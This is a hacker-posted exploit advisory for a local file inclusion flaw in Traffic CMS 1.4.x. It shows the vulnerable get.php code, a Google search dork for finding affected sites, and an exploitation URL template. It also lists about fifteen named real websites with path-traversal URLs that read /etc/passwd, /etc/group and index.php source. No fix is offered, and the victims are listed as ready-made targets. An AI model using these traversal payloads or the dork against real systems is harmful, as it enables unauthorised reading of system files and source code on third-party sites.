Home / os / blackberry

Traffic CMS 1.4.x Local File Inclusion

Posted on 21 November 2015

.__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / Traffic CMS v1.4.x => Local File Inclusion Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Þeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, d4rkvisuaL, BlackEdition DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs, LordERROR ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Traffic CMS |~Affected Version : v1.4.x |~Software : http://www.trafficwebsites.co.uk/ - https://www.facebook.com/trafficwebsites |~RISK : Medium |~Google Keyword : inurl:/admin/media/get.php ( developable ) |~Tested On : [L] Kali Linux [R] Example sites #################### INFO ################################ makes it possible to read all the files from the local base. ####################################################### ### Error Line in 'get.php' ## <?php $ssl = true; $file = $_GET['f']; $path = UL_PATH; $docs = array('doc','docx','xls','xlsx','pdf','zip','txt','rtf','ppt','pptx'); if (file_exists($path.$file)) { $size = filesize($path.$file); $contents = file_get_contents($path.$file); $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo,$path.$file); finfo_close($finfo); if(in_array(file_ext($file), $docs)) .. ######################################################## Tested on; http://www.uha.london/admin/media/get.php?f=../../etc/group https://www.unlimitedshop.co.uk/admin/media/get.php?f=../../etc/group https://www.unlimitedshop.co.uk/admin/media/get.php?f=../index.php () http://www.ticktockrobot.co.uk/admin/media/get.php?f=../../etc/group http://www.powerelectricservices.co.uk//admin/media/get.php?f=../../etc/group http://www.knighthoodcorporate.com/admin/media/get.php?f=../../etc/group http://www.nexusdp.co.uk/admin/media/get.php?f=../../etc/group http://www.thespencepractice.co.uk/admin/media/get.php?f=../../etc/group http://www.brightwell.fr/admin/media/get.php?f=../../../../../etc/passwd http://www.brightwell.co.uk/admin/media/get.php?f=../../../../../etc/passwd http://brightwell.es/admin/media/get.php?f=../../../../../etc/passwd http://www.brightwell-inc.com/admin/media/get.php?f=../../../../../etc/passwd http://www.talbottype.co.uk/admin/media/get.php?f=../../../../../etc/passwd http://www.talbottype.co.uk/admin/media/get.php?f=../index.php http://www.weddinginateacup.co.uk/admin/media/get.php?f=../../../etc/group ############################################################ Exploitation; http://$VICTIM/admin/media/get.php?f=[Local Path] ############################################################

 

TOP